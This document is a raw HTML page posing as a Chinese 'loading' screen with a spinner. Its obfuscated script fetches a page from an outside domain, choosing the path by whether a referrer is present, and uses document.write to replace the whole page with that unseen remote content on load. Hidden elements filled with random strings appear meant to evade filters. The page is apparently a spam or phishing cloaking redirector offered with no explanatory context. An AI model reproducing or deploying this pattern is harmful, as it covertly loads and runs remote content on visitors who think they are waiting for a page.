<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .jkwa1VeSPm {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .jkwa1VeSPm .KICLWyO {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .jkwa1VeSPm .content {
            line-height: 50px;
            text-align: center
        }

        .jkwa1VeSPm .img {
            width: 100%
        }

        .jkwa1VeSPm .GCizxCwYN5c {
            text-align: center
        }

        .jkwa1VeSPm .GCizxCwYN5c span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .jkwa1VeSPm .GCizxCwYN5c span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .jkwa1VeSPm .GCizxCwYN5c span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .jkwa1VeSPm .GCizxCwYN5c span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .jkwa1VeSPm .GCizxCwYN5c span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .jkwa1VeSPm .GCizxCwYN5c span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .jkwa1VeSPm .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function BpX6U0YM6s(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var XsaRH = BpX6U0YM6s('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ XsaRH +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ XsaRH +".html?a=share";
		}
		
        xZYpKWrm=url+"#"+new Date().getTime();
        xZYpKWrm && function() {
            $.get(xZYpKWrm, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>BmOZg76rNH4bPlHU3pjLGRTEDKiQLBMfIoJtA50RG4ZvsO1JAAZdwoZ700qSErBbduslnA863Uuu8BWEO8Ea</a>
<ul style='display:none' >r5JjnhJmhBu4ejLIjhhnsan5YdTxhC3SN8sR</ul>
<h1 style='display:none' >rIp7CaHxSDpBlHE7ZqE70beSaHYe8s6MTGOHx3VV4294WXLNWZMptSfsQer</h1>
<p  style='display:none'>POSgQ4c3aqW7MVIoBOf</p>
<img  src='' style='display:none'>
<div style='display:none'>bXCUbCoM6NCMOU31ndQkKL0rmIWIEfhJEbTesNDTel4BGt</div>
<img  src='' style='display:none'>
<img  src='' style='display:none'><div class="jkwa1VeSPm">
    <div class="KICLWyO">
        <div class="GCizxCwYN5c">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >ABCUmnva5tkiqhQcU53id6LFpSHog1oJw8XDNK7nkG0MfVhsTf</li>
<span style='display:none'>TrVx4fQoHAMSL9WVeytr8INr0TuLKmRvRRfvj5vFSMibBoVMV6yRLsdjkW7HrLyaBgcf8He23srr6kt9AhNuVybILdc1QwRzjrho</span>
<img  src='' style='display:none'>
<div style='display:none'>GqCLnJahck8oGOET9G4p3EeZCZr</div>
<li style='display:none' >ABCUmnva5tkiqhQcU53id6LFpSHog1oJw8XDNK7nkG0MfVhsTf</li>
<img  src='' style='display:none'>
<span style='display:none'>TrVx4fQoHAMSL9WVeytr8INr0TuLKmRvRRfvj5vFSMibBoVMV6yRLsdjkW7HrLyaBgcf8He23srr6kt9AhNuVybILdc1QwRzjrho</span></body>
</html>